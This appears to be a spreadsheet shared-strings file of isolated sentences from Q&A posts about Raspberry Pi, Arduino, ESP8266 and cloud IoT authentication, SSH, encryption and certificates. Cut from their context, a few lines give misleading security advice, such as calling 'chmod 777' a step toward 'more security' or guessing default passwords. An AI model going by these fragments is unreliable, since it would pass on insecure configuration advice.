  <si>
    <t>I'm using Mac OS X and trying to SSH into my pi.</t>
  </si>
  <si>
    <t>I have Intel Galileo board .</t>
  </si>
  <si>
    <t>Do I need a root password
I only have one user onthe pi if that helps</t>
  </si>
  <si>
    <t>Is this a gstreamer issue or ssh tunnel problem?</t>
  </si>
  <si>
    <t>I'm trying to tunnel Gstreamer over ssh.</t>
  </si>
  <si>
    <t>If I run sudo node, I should have permission, but I still get the EPERM error.</t>
  </si>
  <si>
    <t>Here in below code i can get username and password from user.</t>
  </si>
  <si>
    <t>What do you think of my approach, is it okay, is it hackish?</t>
  </si>
  <si>
    <t>Is there maybe a way to login on the XBMC server by GET or POST?</t>
  </si>
  <si>
    <t>Accesspoint works, can connect and ping from several devices.</t>
  </si>
  <si>
    <t>What I'm trying to do is run header through xteaEncrypt.</t>
  </si>
  <si>
    <t>WHY does this work for USERNAME:PASSWORD but not for SERIAL:TOKEN?</t>
  </si>
  <si>
    <t>Background: I am trying to encrypt/decrypt 128 byte of data [using AES128] in an Arduino Uno.</t>
  </si>
  <si>
    <t>I have been able to log into the BBB via ssh.</t>
  </si>
  <si>
    <t>Here are the codes.</t>
  </si>
  <si>
    <t>I just installed OpenWRT on my Raspberry PI but couldn't log in.</t>
  </si>
  <si>
    <t>My first try is eCryptFS.</t>
  </si>
  <si>
    <t>Here's the ssh to my pi with -vvv
Here's my Client .ssh dir:
Here's the pi's:
drwx------  2 pi pi 4096 Jan  7 09:33 .</t>
  </si>
  <si>
    <t>I am trying to encrypt/decrypt 128 byte of data [using AES128] in an arduino UNO.</t>
  </si>
  <si>
    <t>They are infrared, NEC protocol.</t>
  </si>
  <si>
    <t>The AES encryption is enable on my module xbee s1 and I know the key.</t>
  </si>
  <si>
    <t>I think that is AES-CTR, Wireshark can decrypt AES-CCM and it doesn't work.</t>
  </si>
  <si>
    <t>I have a problem with HTTPS Protocol.</t>
  </si>
  <si>
    <t>If I try to login as "root", it asks for a password but no password seems to work.</t>
  </si>
  <si>
    <t>I'm trying to log in over WPA/WPA2 Enterprise with PEAP V0 MSCHAPv2 on Xubuntu, which should work.</t>
  </si>
  <si>
    <t>I can connect a keyboard and mouse to the Pi but I can't get a login window.</t>
  </si>
  <si>
    <t>By the way, here are the codes of the receiver.</t>
  </si>
  <si>
    <t>What is the invalid ELF header telling?</t>
  </si>
  <si>
    <t>I'm writing code to access an I2C sensor in C++ on a raspberry pi using wiringPiI2C.</t>
  </si>
  <si>
    <t>I am new to Intel Galileo.</t>
  </si>
  <si>
    <t>I am using the code below to login with username/password from mysql.</t>
  </si>
  <si>
    <t>Use -Wno-dev to suppress it.</t>
  </si>
  <si>
    <t>What I'm trying to do is show the user name on LCD when the user logs in.</t>
  </si>
  <si>
    <t>I can password-less ssh to each pi.</t>
  </si>
  <si>
    <t>We have a system of 10 networked Arduinos with ethershields.</t>
  </si>
  <si>
    <t>I need to use sudo to access Raspberry's GPIO.</t>
  </si>
  <si>
    <t>I have the SSH running from Mac to Win10, but are not get RDP working.</t>
  </si>
  <si>
    <t>Is my code faulty or should I just get a new device?</t>
  </si>
  <si>
    <t>Connect via SSH or something.</t>
  </si>
  <si>
    <t>Below is the code i ran on the Intel Galileo Gen2.</t>
  </si>
  <si>
    <t>When type sudo on the pi, it never asks for a password which is fine with me.</t>
  </si>
  <si>
    <t>Bluetooth.org) 
Where do I enable security?</t>
  </si>
  <si>
    <t>I got codes like this..</t>
  </si>
  <si>
    <t>I know the SSH options but that will be on the same network right ?</t>
  </si>
  <si>
    <t>In checkout, it does not authenticate.</t>
  </si>
  <si>
    <t>I have a login/password to connect.</t>
  </si>
  <si>
    <t>But I can't debug it and I can't unlock it.</t>
  </si>
  <si>
    <t>I would like to settup my Raspberry Pi to auto login in a specific user.</t>
  </si>
  <si>
    <t>I have it working, but am now trying to bulletproof it.</t>
  </si>
  <si>
    <t>Moreover, I could not ssh to the device to see any log on the system...</t>
  </si>
  <si>
    <t>Does anyone knows how to scan QR codes on Windows 10 IoT for Raspberry Pi?</t>
  </si>
  <si>
    <t>Is there somewhere to encrypt the password on the ESP8266 with Lua?</t>
  </si>
  <si>
    <t>Up until now I have been happy for a watchdog timeout to activate bootloader.</t>
  </si>
  <si>
    <t>Like this:
accessKeyId = YOUR_ACCESS_KEY_ID
secretAccessKey = YOUR_SECRET_ACCESS_KEY</t>
  </si>
  <si>
    <t>Can someone help me to use my Intel Edison via Arduino IDE?</t>
  </si>
  <si>
    <t>All permissions are still the same.</t>
  </si>
  <si>
    <t>For your understanding: I can not use SSH/putty!</t>
  </si>
  <si>
    <t>The VPN server might be unreachable.</t>
  </si>
  <si>
    <t>so I can use that identity to register to the system.</t>
  </si>
  <si>
    <t>The html page takes wifi name and password, then the php triggers bash script file to connect Raspberry Pi to wifi.</t>
  </si>
  <si>
    <t>I am trying to access to a server through ssh.</t>
  </si>
  <si>
    <t>How can I log in with my Microsoft Account?</t>
  </si>
  <si>
    <t>The serialHandle is always "0xffff" which is INVALID_HANDLE.</t>
  </si>
  <si>
    <t>if I run  I can see my DEVICE_ID and DEVICE_TOKEN.</t>
  </si>
  <si>
    <t>I want this python script to run when I power my Intel Galileo.</t>
  </si>
  <si>
    <t>The Intel Galileo is running Yocto, and is i586.</t>
  </si>
  <si>
    <t>I only need API mode to use the ACK and encryption.</t>
  </si>
  <si>
    <t>but the moment I connect my Intel Galileo gen2, it disappears.</t>
  </si>
  <si>
    <t>The permissions are unchanged.</t>
  </si>
  <si>
    <t>But what is the username &amp; password.</t>
  </si>
  <si>
    <t>What can I do now to bypass the password requirement?</t>
  </si>
  <si>
    <t>token
     if!</t>
  </si>
  <si>
    <t>I won't have physical access to the device or it's network once it is deployed.</t>
  </si>
  <si>
    <t>createKeysAndCertificateFromCsr method.</t>
  </si>
  <si>
    <t>Is there a way to get a unique device Id for a Raspberry Pi IoT device on UWP?</t>
  </si>
  <si>
    <t>How do I configure my Raspberry Pi 3 (running Raspbian) to connect to a hidden network?</t>
  </si>
  <si>
    <t>I have set up a raspberry pi as a Wifi access point.</t>
  </si>
  <si>
    <t>KEY is my key from the maker.</t>
  </si>
  <si>
    <t>Currently trying to get ssh file transfer functionalities with my Mac.</t>
  </si>
  <si>
    <t>ECDSA key fingerprint is 13:91:24:8e:6f:21:98:1f:5b:3a:c8:42:7a:88:e9:91.</t>
  </si>
  <si>
    <t>I want indications but codes are welcome too.</t>
  </si>
  <si>
    <t>I have logged into raspberry pi via SSH.</t>
  </si>
  <si>
    <t>I am accessing my raspberry pi 3 from ssh.</t>
  </si>
  <si>
    <t>Can you tell me how to shut it down from ssh.</t>
  </si>
  <si>
    <t>The Appx package's manifest is invalid.</t>
  </si>
  <si>
    <t>How can I use WiringPi library through SSH on Netbeans?</t>
  </si>
  <si>
    <t>It asks me for an FTP login.</t>
  </si>
  <si>
    <t>I'm using TI DSP Keystone II device for 10G Ethernet service.</t>
  </si>
  <si>
    <t>It seems that WiFi hasn't been reconnected.</t>
  </si>
  <si>
    <t>So far, SSH is all I can think of.</t>
  </si>
  <si>
    <t>It uses ESP8266WiFi and WiFiClientSecure libs.</t>
  </si>
  <si>
    <t>Currently I don't have codes on this.</t>
  </si>
  <si>
    <t>There is no mouse, keyboard, SSH, VNC, etc available.</t>
  </si>
  <si>
    <t>With phpmyadmin I use the username root</t>
  </si>
  <si>
    <t>So i Setup my Raspberry and Tried to SSH into the Pi.</t>
  </si>
  <si>
    <t>I have a project "smart house" and I use Arduino Mega with Ethernet Shield.</t>
  </si>
  <si>
    <t>Most of my errors seem to be permissions errors.</t>
  </si>
  <si>
    <t>I would like to user FaceRecognizer() provoded with opencv.</t>
  </si>
  <si>
    <t>I have a Intel Galileo Gen. 2 board.</t>
  </si>
  <si>
    <t>Origin 'http://127.0.0.1:8080' is therefore not allowed access.</t>
  </si>
  <si>
    <t>When I running db.logs_my_application_token.</t>
  </si>
  <si>
    <t>I registered my raspberry pi as a gateway and as a senseHat device in my watson iot platform.</t>
  </si>
  <si>
    <t>We're trying to connect via putty and SSH to a raspberry-pi.</t>
  </si>
  <si>
    <t>I am using this Arduino library for encryption on the Arduino and the Java Cryptographic Extension (JCE) framework for the Java side.</t>
  </si>
  <si>
    <t>My requirement is to use WebREPL via the University Wi-Fi, which uses WPA2 Enterprise EAP-MSCHAPv2 authentication.</t>
  </si>
  <si>
    <t>The problem is that Google Analytics Measurement Protocol usses HTTPS - Which my code doesn't work with.</t>
  </si>
  <si>
    <t>I would like to ask you, have you ever coded AES-128 encrypt or decrypt for LORA IOT sensor with javascript or node js?</t>
  </si>
  <si>
    <t>I've been trying to login to the zwave module from python, but so far it hasn't worked.</t>
  </si>
  <si>
    <t>could it be something to do with permissions?</t>
  </si>
  <si>
    <t>On the Android device I get an error "Incorrect login information.</t>
  </si>
  <si>
    <t>My Codes:</t>
  </si>
  <si>
    <t>first of all i wanted to clearify, that i'm not asking, how to access a raspberry pi from the internet.</t>
  </si>
  <si>
    <t>I am using the method wifi.softAp(username,password) for creation of wifi network.</t>
  </si>
  <si>
    <t>I administer the raspberry over ssh.</t>
  </si>
  <si>
    <t>1- how would I go about security?</t>
  </si>
  <si>
    <t>Which files should be used for WiFiClientSecure?</t>
  </si>
  <si>
    <t>What i actually do is to connect to my raspberry with ssh.</t>
  </si>
  <si>
    <t>I tried to install Bugzilla on my Raspberry.</t>
  </si>
  <si>
    <t>I looked it up and it seemed like the fix was to run "sync" before running "sudo shutdown" and unplugging the device.</t>
  </si>
  <si>
    <t>Ran chmod +x rtkstart.sh and chmod +x rtkshut.sh as it wanted permissions.</t>
  </si>
  <si>
    <t>I uses admin as the login and password, but I get an error: 
What am I doing wrong ?</t>
  </si>
  <si>
    <t>But it still asks for password when I 
ssh to my raspberry.</t>
  </si>
  <si>
    <t>Now, the RPI2 can't be accessed through ssh client or ftp server.</t>
  </si>
  <si>
    <t>I'm working with Intel Edison board.</t>
  </si>
  <si>
    <t>Here's the password generator python code.</t>
  </si>
  <si>
    <t>I couldn't connect my iot device to azure iot hub to register device.</t>
  </si>
  <si>
    <t>This laptop can ping and SSH into the Raspberry Pi just fine.</t>
  </si>
  <si>
    <t>I am not able to SSH to Raspberry Pi 3 from Putty.</t>
  </si>
  <si>
    <t>I can't access the IP address of the shield.</t>
  </si>
  <si>
    <t>I am using PyQt5.8 on a raspberry Pi 3, my application had a login form.</t>
  </si>
  <si>
    <t>in Configure Blockchain pane.</t>
  </si>
  <si>
    <t>Was not able to register.</t>
  </si>
  <si>
    <t>hostname
# Use the hardware address of the interface for the Client ID.</t>
  </si>
  <si>
    <t>This cameras have their own wifi access point.</t>
  </si>
  <si>
    <t>What is the MQTT authentication user registry?</t>
  </si>
  <si>
    <t>Using a tutorial scrypt.</t>
  </si>
  <si>
    <t>... and  more over it crashes the ssh session we are connected to access the rapsberry device.</t>
  </si>
  <si>
    <t>Just need to connect via SSH to again.</t>
  </si>
  <si>
    <t>Both valid and invalid are on them.</t>
  </si>
  <si>
    <t>I am trying to use X.509 certificates.</t>
  </si>
  <si>
    <t>I am a newbie on sonoff, trying to flash its firmware to sonoff tasmota.</t>
  </si>
  <si>
    <t>Here are the two codes.</t>
  </si>
  <si>
    <t>Master Code
Slave Code</t>
  </si>
  <si>
    <t>pi@192.168.0.3's password:</t>
  </si>
  <si>
    <t>Both are loaded with the 802.15.4 firmware.</t>
  </si>
  <si>
    <t>But if I login ssh normally, I do not have the error.</t>
  </si>
  <si>
    <t>The goal is for the user to select a WiFi network.</t>
  </si>
  <si>
    <t>I tried via ssh but it never worked.</t>
  </si>
  <si>
    <t>I need to record the device data (IOT device) into the blockchain.</t>
  </si>
  <si>
    <t>These are the codes I'm using.</t>
  </si>
  <si>
    <t>err= null info= {
  "ip": "192.168.1.105",
  "netmask": "255.255.255.0",
  "gw": "192.168.1.1",
  "mac": "5c:**:7f:**:7a:**"
 }</t>
  </si>
  <si>
    <t>Can I flush it somehow with fflush(SOME_SECRET_BUFFER)?</t>
  </si>
  <si>
    <t>If you want some pseudocode:</t>
  </si>
  <si>
    <t>It shouldn't be a permissions error, because I have tried this on both a user crontab and a system crontab, and both fail.</t>
  </si>
  <si>
    <t>Does it have something to do with the Pi permissions?</t>
  </si>
  <si>
    <t>To do so, the script has to authenticate on the webapp first.</t>
  </si>
  <si>
    <t>Here is part of my lua code
*X-CSRF-TOKEN and JSESSIONID in this example are dummy values.</t>
  </si>
  <si>
    <t>Do I need to register my raspberry pi as a device before?</t>
  </si>
  <si>
    <t>Mean while, when I try to access routes from other device(laptop), I get all admin access from other device.</t>
  </si>
  <si>
    <t>So far I'm leaning towards using Jsch in my app to ssh into the Pi and execute the command, but I have been told this is silly.</t>
  </si>
  <si>
    <t>But when I try to connect the registered device with orgId and auth-Token, it is not connecting.</t>
  </si>
  <si>
    <t>I keep seeing different codes that aren't working.</t>
  </si>
  <si>
    <t>(Keychain and identity card tag).</t>
  </si>
  <si>
    <t>I am using WEP encryption.</t>
  </si>
  <si>
    <t>But I need to have opcodes for some analysis.</t>
  </si>
  <si>
    <t>However I have to SSH into the Pi user which runs in lshell.</t>
  </si>
  <si>
    <t>If not, it will ask the user for permission.</t>
  </si>
  <si>
    <t>There is NO authentication hook on that service since I am just in dev so authentication module is not needed.</t>
  </si>
  <si>
    <t>The output is:
MYip: 0.0.0.0 
Netmask: 0.0.0.0 
Gateway: 0.0.0.0 
DNS: 0.0.0.0 
For example testDHCP.ino don't work for me.</t>
  </si>
  <si>
    <t>Or does Firebase have a facility to provide authentication?</t>
  </si>
  <si>
    <t>Hi I Have Terrible codes in Raspberry Pi 3.</t>
  </si>
  <si>
    <t>Password check
2.</t>
  </si>
  <si>
    <t>But then I thought maybe there's no need to SSH.</t>
  </si>
  <si>
    <t>If JTAG isn't, what is, and can I spoof it?</t>
  </si>
  <si>
    <t>I'm not well versed in crypto so can anyone help enlighten me here.</t>
  </si>
  <si>
    <t>For server authentication, the JVM's root certificates
        // are used.</t>
  </si>
  <si>
    <t>I am able to get into mysql by "sudo"
sudo mysql -u root
but i am not able to login through the password.</t>
  </si>
  <si>
    <t>However, it does not work, when I proxy from laptop through the Raspberry.</t>
  </si>
  <si>
    <t>Now I want to register a aws.iot device with the same cognito credential.</t>
  </si>
  <si>
    <t>The first is the login.</t>
  </si>
  <si>
    <t>Here are my codes:</t>
  </si>
  <si>
    <t>I'm using the Adafruit Kookye fingerprint module in my project.</t>
  </si>
  <si>
    <t>",
"status": "UNAUTHENTICATED".</t>
  </si>
  <si>
    <t>It seems like there is an OAuth2 and a json token now.</t>
  </si>
  <si>
    <t>( not ssh) failure.</t>
  </si>
  <si>
    <t>Some sort of SSH tunnel, perhaps?</t>
  </si>
  <si>
    <t>I am still convinced it has to do with permissions.</t>
  </si>
  <si>
    <t>3) The codes for the client and the server are below.</t>
  </si>
  <si>
    <t>i know my password its fine, but must be somethig else...</t>
  </si>
  <si>
    <t>and how would I go about ssh-ing into the pi?</t>
  </si>
  <si>
    <t>How can the background app connect to the server, register the device in Database?.</t>
  </si>
  <si>
    <t>npm bugs authblue-ui-ssr-spike
npm ERR!</t>
  </si>
  <si>
    <t>npm owner ls authblue-ui-ssr-spike
npm ERR!</t>
  </si>
  <si>
    <t>/home/sujeet/Desktop/labz/authblue-ui-ssr-spike/npm-debug.log</t>
  </si>
  <si>
    <t>so ifconfig eth0 down will not do anything.</t>
  </si>
  <si>
    <t>sudo ifconfig eth0 down will take eth0 down, but it will also work with sudo ifconfig eth1 down, which I do not want.</t>
  </si>
  <si>
    <t>I'm working on a web application where the user can login with AWS Cognito.</t>
  </si>
  <si>
    <t>My question is, is this scheme secure?</t>
  </si>
  <si>
    <t>If no, is there any other method to authenticate with GCS?</t>
  </si>
  <si>
    <t>The PC and RBPi are conected throught network.</t>
  </si>
  <si>
    <t>I am trying to modify  module to act as Captive portal.</t>
  </si>
  <si>
    <t>Its not the password of my raspbian pi, i already tried that.</t>
  </si>
  <si>
    <t>Hi I want to use my Raspberry PI Zero as a HID Device (Joystick).</t>
  </si>
  <si>
    <t>I have created a bks file using bouncycastle which has both certificate and key.</t>
  </si>
  <si>
    <t>So the esp is not bugged.</t>
  </si>
  <si>
    <t>How do I shutdown my windows 10 PC from my raspberry pi 3?</t>
  </si>
  <si>
    <t>I pass registrationid, tpmendoresmentkey, storagekey to api.</t>
  </si>
  <si>
    <t>The scanner is the Raspberry Pi3 B device and zero W is the Beacon.</t>
  </si>
  <si>
    <t>I'm trying to access my USB webcam, because I do not have the raspberry camera module.</t>
  </si>
  <si>
    <t>I currently have a central login system, and after I login to it, there will be 3 links to each of the Raspberry Pis.</t>
  </si>
  <si>
    <t>I suspect that this interrupt is the eth0 interrupt (how can I confirm this?).</t>
  </si>
  <si>
    <t>Javascript Decryption Code:
ESP8266 Arduino Sketch Code:</t>
  </si>
  <si>
    <t>So it's definitely nothing with user permissions.</t>
  </si>
  <si>
    <t>When min version is 14393 the request is not authorised i.e.</t>
  </si>
  <si>
    <t>This will prevent a hardware modification on my board which is using the raspberry pi GPIO header CE pin as CS.</t>
  </si>
  <si>
    <t>Login and password is correct.</t>
  </si>
  <si>
    <t>Is my Raspberry Pi getting jitter and being very imprecise or was I a victim of falsification?</t>
  </si>
  <si>
    <t>do I have to have a whole keychain or something?</t>
  </si>
  <si>
    <t>I'd like to block communication with a device in a registry in Google Cloud IOT.</t>
  </si>
  <si>
    <t>I have the the authenticated user with federated ID.</t>
  </si>
  <si>
    <t>All devices have an X.509 certificate authentication.</t>
  </si>
  <si>
    <t>I can only enroll devices with X.509 or TPM.</t>
  </si>
  <si>
    <t>I am currently trying to encrypt a file on a raspberry pi (a) and then decrypt the file on a Mac (b).</t>
  </si>
  <si>
    <t>Origin 'http://192.168.100.2:8100' is therefore not allowed
  access.</t>
  </si>
  <si>
    <t>I am working with a raspberry pi with a relay with the incandescent bulb, buzzer, and button via SSH.</t>
  </si>
  <si>
    <t>Do I need to use X509 certificates or is it possible to use SAS with this device?</t>
  </si>
  <si>
    <t>You can do this with IoT Hub and use the MS Device Explorer to generate the SAS token.</t>
  </si>
  <si>
    <t>No other hardware or shield is connected.</t>
  </si>
  <si>
    <t>How do I connect via Javascript using a 3rd party MQTT library and a SAS token?</t>
  </si>
  <si>
    <t>SPI_FLASH_SEC_SIZE is a macro with value 4096.</t>
  </si>
  <si>
    <t>I can still SSH into the Pi and use the Pi but the webpage becomes unresponsive.</t>
  </si>
  <si>
    <t>AWS Cognito primarly meant for Serverless user authentication from Mobile or Web application (Javascript).</t>
  </si>
  <si>
    <t>But when I'm running it on my Raspberry Pi server it says that the password is incorrect.</t>
  </si>
  <si>
    <t>I don't think it's the certificates, because they work when I use them with MQTT_WS.</t>
  </si>
  <si>
    <t>Plus I access Pi with ssh.</t>
  </si>
  <si>
    <t>0x4 : 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
Authenticated block nb.</t>
  </si>
  <si>
    <t>0x5 : AB, CD, EF, 1, 23, 45, 67, 89, 98, 76, 54, 1A, 10, FE, DC, BA
Authenticated block nb.</t>
  </si>
  <si>
    <t>0x6 : 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
Authenticated block nb.</t>
  </si>
  <si>
    <t>I am trying to connect via ssh to my pi on my mac and frankly I don't know much about what I am doing.</t>
  </si>
  <si>
    <t>Is there a way to shutdown or reboot a raspberry pi via a script?</t>
  </si>
  <si>
    <t>I have a web-server with an SSL certificate, and an unsecured device on a GSM/GPRS network (arduino MKR GSM 1400).</t>
  </si>
  <si>
    <t>I'm trying to exploit ret2libc in ARM (Raspberry pi).</t>
  </si>
  <si>
    <t>Do I generate these from the root certificate?</t>
  </si>
  <si>
    <t>Then I change the default admin password and reset.</t>
  </si>
  <si>
    <t>I am trying to use an arduino to encrypt data as AES128 and then decrypt it.</t>
  </si>
  <si>
    <t>Hardware setup: Arduino Mega with an Ethernet card (shield) and an Intel NUC with Ubuntu 16.04.</t>
  </si>
  <si>
    <t>I have it TLS'd with the server's cert.</t>
  </si>
  <si>
    <t>This is our PHP codes.</t>
  </si>
  <si>
    <t>iPhone connects to the network as hoc of the device.</t>
  </si>
  <si>
    <t>2018-11-17 03:50:53: Invalid protocol "MQIs" in CONNECT from 73.94.66.49.</t>
  </si>
  <si>
    <t>I tried debauching like code with millis() but it did not work.</t>
  </si>
  <si>
    <t>I want to get the SSID and Password from the user und connect it to WIFI.</t>
  </si>
  <si>
    <t>Code for the Access-point 
Code for the Client</t>
  </si>
  <si>
    <t>Here are the codes used.</t>
  </si>
  <si>
    <t>If so, how to access it to store password and use it through my UWP application.</t>
  </si>
  <si>
    <t>Button 3, Button 2, Button 3, Button 1, Button 4 --&gt; Passcode = 32314).</t>
  </si>
  <si>
    <t>I am able to connect via SSH to my raspberry pi.</t>
  </si>
  <si>
    <t>Is there a secret here I don't know?</t>
  </si>
  <si>
    <t>username : null;
            p = password ?</t>
  </si>
  <si>
    <t>Could it be caused by the permissions on my nfts usb hdd?</t>
  </si>
  <si>
    <t>I get an authentication error from MySQL.</t>
  </si>
  <si>
    <t>(Exception from HRESULT: 0x8007000D)
  The data is invalid.</t>
  </si>
  <si>
    <t>Both devices are connected to the network via Wi-Fi.</t>
  </si>
  <si>
    <t>If possible I would like it to be NEWUSER:PASSWORD@mysite:80/limited/file.php.</t>
  </si>
  <si>
    <t>Question is how to use/configure the certificate on apache server on my raspberry pi3</t>
  </si>
  <si>
    <t>The crontab -e
torrent.sh
The torrent.sh has got all permissions.</t>
  </si>
  <si>
    <t>Mar  2 22:12:23 raspberrypi systemd[711]: Listening on GnuPG cryptographic agent (ssh-agent emulation).</t>
  </si>
  <si>
    <t>There's not too many example codes with the MultiMoto motor shield.</t>
  </si>
  <si>
    <t>If the JSON payload is invalid ( e.g.</t>
  </si>
  <si>
    <t>How to login AWS IoT using IAM Usercredential?</t>
  </si>
  <si>
    <t>2- AWS IOT to control the air conditioner, (authorization is done through AWS certificates).</t>
  </si>
  <si>
    <t>Now i, m searching for a code to read sensor SHT35 connected to TCA9548A.</t>
  </si>
  <si>
    <t>How do I update Spyder on my raspberry pi 3?</t>
  </si>
  <si>
    <t>The USB coordinator is a Nortek Security and Control USB.</t>
  </si>
  <si>
    <t>The user should have a IAM access.</t>
  </si>
  <si>
    <t>For example over ssh?</t>
  </si>
  <si>
    <t>username and password.</t>
  </si>
  <si>
    <t>I have a Raspberry PI running on 192.168.1.xx and I'm trying to SSH from this PI to a second PI running inside VirtualBoxVM.</t>
  </si>
  <si>
    <t>HTTPS handshake fail with error 40.</t>
  </si>
  <si>
    <t>It reads both the card and keychain that came with the module.</t>
  </si>
  <si>
    <t>How do I store the certificateID in the keychain?</t>
  </si>
  <si>
    <t>(I have the certID, pem, and privateKey)</t>
  </si>
  <si>
    <t>I do not provide access to unauthenticated identities.</t>
  </si>
  <si>
    <t>Never coded before.</t>
  </si>
  <si>
    <t>I'm running VS Code insiders on macOS Mojave 10.14.4.</t>
  </si>
  <si>
    <t>I want to connect raspberry pi 3 with my android app using SSH.</t>
  </si>
  <si>
    <t>I am using the Bosch IoT Suite's Permissions Service.</t>
  </si>
  <si>
    <t>LoRaWAN specifies security keys: NwkSKey, AppSKey and AppKey.</t>
  </si>
  <si>
    <t>I have problem with this password and id.</t>
  </si>
  <si>
    <t>I tried with several codes.</t>
  </si>
  <si>
    <t>I got tips about Server- and ClientAliveIntervals, but there is no SSH here.</t>
  </si>
  <si>
    <t>But if I want to debug with this configuration, I get this error in console window:
I can connect to the remote raspberry using SSH.</t>
  </si>
  <si>
    <t>Now I am using Linux Mint 19.1 and ssh to access Raspbian 4.14.</t>
  </si>
  <si>
    <t>I am working with custom CA (certificate authority) on AWS IoT.</t>
  </si>
  <si>
    <t>I wonder if there is a way to lock it down to only my CA?</t>
  </si>
  <si>
    <t>I ssh'd into the pi.</t>
  </si>
  <si>
    <t>Steps:
Login with username and password.</t>
  </si>
  <si>
    <t>Pls help by providing some codes</t>
  </si>
  <si>
    <t>The problem is it is easy to mistype the password with the onscreen keyboard.</t>
  </si>
  <si>
    <t>I'm running codes in Spyder 3 ann it's where I get the stream of plots.</t>
  </si>
  <si>
    <t>What can I do to allow this kind of access?</t>
  </si>
  <si>
    <t>It still need to do something 
Use SSH tunnel.</t>
  </si>
  <si>
    <t>Is it possible access raspberry Pi by SSH tunnel?</t>
  </si>
  <si>
    <t>It uses SAS, therefore no security certificates are needed.</t>
  </si>
  <si>
    <t>(TLS authentication error.)</t>
  </si>
  <si>
    <t>---&gt; System.Security.Authentication.AuthenticationException: TLS authentication error.</t>
  </si>
  <si>
    <t>Yes very hacky but it worked.</t>
  </si>
  <si>
    <t>The problem is 
that certificateId should be in some kind of keychain.</t>
  </si>
  <si>
    <t>The device is being registered as a misc device.</t>
  </si>
  <si>
    <t>That way I can register a handler to set the hostname.</t>
  </si>
  <si>
    <t>Does raspberry pi need firewall?</t>
  </si>
  <si>
    <t>I've seen how to install Kali on Raspberry Pi and how to ssh as root on Ubuntu.</t>
  </si>
  <si>
    <t>If not, how do I SSH from my laptop to the Raspberry Pi with Kali as root?</t>
  </si>
  <si>
    <t>To connect I have to pin out the 'Vcc' of ESP8266 and pin in again and then again connect with ESP8266 network and go to configure portal.</t>
  </si>
  <si>
    <t>But I can't access to Blackboard unless I am admin.</t>
  </si>
  <si>
    <t>Can fscanf be coerced into doing so?</t>
  </si>
  <si>
    <t>Just loaded the firmware on my board.</t>
  </si>
  <si>
    <t>Have fun hacking.</t>
  </si>
  <si>
    <t>This is not an application error, this is spam in your log from the system.</t>
  </si>
  <si>
    <t>You'll need to try ssh'ing in from outside your network.</t>
  </si>
  <si>
    <t>I can compile and login.</t>
  </si>
  <si>
    <t>The problem was that the java program did not have the permission to access .</t>
  </si>
  <si>
    <t>You can do X11 forwarding with ssh.</t>
  </si>
  <si>
    <t>See __clear_cache for how to invalidate cache(s).</t>
  </si>
  <si>
    <t>Here is a guide on how to do upgrade the firmware on the Arduino WiFiShield.</t>
  </si>
  <si>
    <t>If it is through ssh, the above is what you would want to do.</t>
  </si>
  <si>
    <t>Wireless ADB is the only way to debug while the USB port is in use.</t>
  </si>
  <si>
    <t>The pin is hardwired on the shield.</t>
  </si>
  <si>
    <t>pi is the Raspberry Pi's default username.</t>
  </si>
  <si>
    <t>It was the mac firewall.</t>
  </si>
  <si>
    <t>For SSH port 22 should be open.</t>
  </si>
  <si>
    <t>In indoor environment, WiFi signal may penetrate only a few brick walls.</t>
  </si>
  <si>
    <t>Maybe ssh in and use minicom?</t>
  </si>
  <si>
    <t>If you need more power and more "intelligence", why not try a raspberry pi?</t>
  </si>
  <si>
    <t>You don't have to run the webbrowser as root but your django app (the webserver).</t>
  </si>
  <si>
    <t>You can assign a secret key (i.e.</t>
  </si>
  <si>
    <t>Ofcourse both php and python have to have permissions to file.</t>
  </si>
  <si>
    <t>Should the Arduino authenticate itself or the visitor?</t>
  </si>
  <si>
    <t>You can also drop your root permissions with sudo.</t>
  </si>
  <si>
    <t>The sensor itself was faulty.</t>
  </si>
  <si>
    <t>Here's a tutorial how to install and use sshfs.</t>
  </si>
  <si>
    <t>You will have to log in as .</t>
  </si>
  <si>
    <t>You can use it to scan and connect to wireless networks.</t>
  </si>
  <si>
    <t>You need permission to access the device.</t>
  </si>
  <si>
    <t>Your user name and password will be hacked if you use this protocol.</t>
  </si>
  <si>
    <t>To connect to a WPA2 network you need the network to be available an a password.</t>
  </si>
  <si>
    <t>Because the accesspoint will hand over the IP adresses through DHCP.</t>
  </si>
  <si>
    <t>2560 bootloader just implements firmware flash.</t>
  </si>
  <si>
    <t>The next hurdle I had was permissions.</t>
  </si>
  <si>
    <t>Install sshfs:
2.</t>
  </si>
  <si>
    <t>firmware bug.</t>
  </si>
  <si>
    <t>I'd use the first one, maybe without security.</t>
  </si>
  <si>
    <t>char *headAddress = (char *)&amp;header;
char *buffAddress = (char *)&amp;buff;
for (uint32_t i = 0; i &lt; 4; i++)
{
    memcpy(data, headAddress+(i*BLOCK_SIZE), BLOCK_SIZE);
    xteaEncrypt((uint32_t*)data);
    memcpy(&amp;buffAddress+(i*BLOCK_SIZE), data, BLOCK_SIZE);
}</t>
  </si>
  <si>
    <t>Apple's security mode doesn't allow for this.</t>
  </si>
  <si>
    <t>Thus, you can't assign it to username.</t>
  </si>
  <si>
    <t>This allowed me to generate keystrokes from an addon.</t>
  </si>
  <si>
    <t>First of all, QR codes aren't magic.</t>
  </si>
  <si>
    <t>What's their access permission?</t>
  </si>
  <si>
    <t>However, the file permissions are e.g.</t>
  </si>
  <si>
    <t>you should log to your rpi with ssh.</t>
  </si>
  <si>
    <t>But to access via this method, you need a server in between that's having a public ip.</t>
  </si>
  <si>
    <t>You can then ssh into it.</t>
  </si>
  <si>
    <t>I work at Intel and may be able to help.</t>
  </si>
  <si>
    <t>How to enable SSH on Raspberry Pi</t>
  </si>
  <si>
    <t>Your device will restart and you have to log in.</t>
  </si>
  <si>
    <t>More here -&gt; http://wiki.openwrt.org/doc/howto/firstlogin</t>
  </si>
  <si>
    <t>But not an identifier.</t>
  </si>
  <si>
    <t>Run the command (for more security relative to permission 777).</t>
  </si>
  <si>
    <t>The password may be "1234" or "0000".</t>
  </si>
  <si>
    <t>You may have forgotten to use  or sudo chmod 777 /media/owncloud (for more security).</t>
  </si>
  <si>
    <t>Have you tried ssh applications on android ?</t>
  </si>
  <si>
    <t>All permissions
(e.g.</t>
  </si>
  <si>
    <t>Apache Qpid Proton can be runned on Intel Galileo and Windows 8.</t>
  </si>
  <si>
    <t xml:space="preserve">
SSL_library_init cause SIGILL when running under gdb...</t>
  </si>
  <si>
    <t>These codes should be what u are looking for</t>
  </si>
  <si>
